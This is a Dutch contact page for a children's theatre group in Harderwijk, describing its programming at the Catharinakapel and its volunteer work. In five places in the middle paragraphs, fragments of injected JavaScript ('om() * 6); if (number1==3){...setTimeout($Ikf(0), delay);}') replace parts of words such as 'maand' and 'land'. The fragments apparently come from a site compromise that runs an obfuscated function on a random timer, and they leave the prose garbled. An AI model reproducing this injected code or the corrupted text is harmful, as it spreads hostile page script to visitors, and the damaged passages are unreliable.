Contact

 

 

 

Al 40 jaar wordt in de Catharinakapel het theateraanbod voor kinderen van 2 tot 12 jaar verzorgd door Werkgroep Jeugdtheater Harderwijk (als onderdeel van de Stichting Podia Harderwijk).

We combineren toegankelijkheid met kwaliteit en diepgang en we stellen ons tot doel dat er een aanbod blijft bestaan dat vernieuwend, soms experimenteel en verrassend is. Vaak kan het op verschillende niveaus begrepen worden waardoor de voorstelling aantrekkelijk is voor jong en oud.

In onze unieke intieme theater van de Catharinakapel staan de spelers letterlijk dicht bij de kinderen, dit geeft een bijzondere wisselwerking. Het theater haalt het kind even weg uit het gewone dagelijks leven wat het een spannende geestverruimende en fantasieprikkelende ervaring maakt. Zo is iedere voorstelling een belevenis op zich. We zien je graag in ons prachtige theater. Komt dat zien…en geniet. WELKOM!

Achter de schermen zorgt een enthousiaste groep vrijwilligers ervoor dat er iedere maandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and in Harderwijk een verrassende voorstelling is te zien. Ieder heeft haar eigen kwaliteiten en op basis daarvan zijn de taken verdeeld. Het brengt al met al best veel werk met zich mee, maar het is leuk om ervoor te zorgen dat er een gevarieerd en kwalitatief goed aanbod is. Dit doen we door presentatiedagen van theaterbureaus elders in het landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and te bezoeken. Meestal zijn daar schoolklassen bij, zodat we kunnen zien hoe kinderen reageren op de voorstellingen. Kinderen zijn een heel eerlijk publiek en laten duidelijk weten of ze iets leuk vinden of niet.

 Bij het boeken van een voorstelling wordt nooit over één nacht ijs gegaan. De ene maandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and kiezen we voor verteltheater voor bijvoorbeeld de allerkleinsten. Weer een andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander keer is er uitdagend fysiek theater voor 8 plussers. Muziektheater of poppentheater: wij zorgen voor een afwisselend theateraanbod. We zijn op zoek naar de juweeltjes, de pareltjes, de voorstellingen die ´net even andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders´ zijn. Wij proberen kinderen iets aan te bieden waardoor de fantasie geprikkeld wordt en die de blik verruimt.

Waarom jeugdtheater?

Het simpele antwoord komt van ons aller Annie MG Schmidt..‘ ik ben eigenlijk altijd 8 gebleven!’

De voorstellingen vinden plaats in:                              Postadres is:
Kunstcentrum Catharinakapel                                     Postbus 95
Klooster 1                                                                     3840 AB Harderwijk
3841 EN Harderwijk

    Vul hieronder het contactformulier in en wij nemen indien nodig contact met je op

    Reacties zijn gesloten.